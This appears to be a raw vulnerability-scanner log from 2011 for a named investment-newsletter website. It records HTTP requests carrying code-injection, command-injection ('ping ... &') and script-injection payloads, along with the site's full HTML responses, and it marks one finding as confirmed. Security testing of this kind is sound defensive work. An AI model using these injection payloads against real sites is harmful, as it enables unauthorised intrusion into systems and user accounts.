Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/pwa/?nsextt=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/pwa
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12152
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/nsextt=%20netsparker(0x003B13)%20">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23710
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Private Wealth Alliance Comprehensive Investment Research Report </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The Private Wealth Alliance is an investment research program that combines 5 of the best selling investment newsletters from Stansberry Research.">
<meta name="keywords" content="market research newsletter, stock research newsletter, stock investment, stocks investment, investment research analyst, research reports, investment research, stock research">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/pwa";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/'"--></style></script><script>netsparker(0x003B57)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<table id=main cellspacing=0 cellpadding=3 width=800 align=center
bgcolor=#ffffff>
<tbody>
<tr>
<td valign=top align=left height=21><div align=center>
<div align=center>
<div align=left>
<div align=left>
<div align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><font face="Verdana, Arial, Helvetica, sans-serif"
size=2></font></div>
</div>
</div>
</div>
</div>
</div></td>
</tr>
</tbody>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<td width="1" bgcolor="#cccccc"><img src="1-1.gif" width="1"
height="1"></td>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/pwa_title_sm.gif" alt="Private Wealth Alliance " width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">The <em>Private Wealth Alliance</em> is a package of our best and most comprehensive investment research publications. </font></p>
<p><font size=&..
- /pub/sug/

/pub/sug/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/sug/?nsextt=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/sug
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12152
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/nsextt=%20netsparker(0x003B13)%20">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
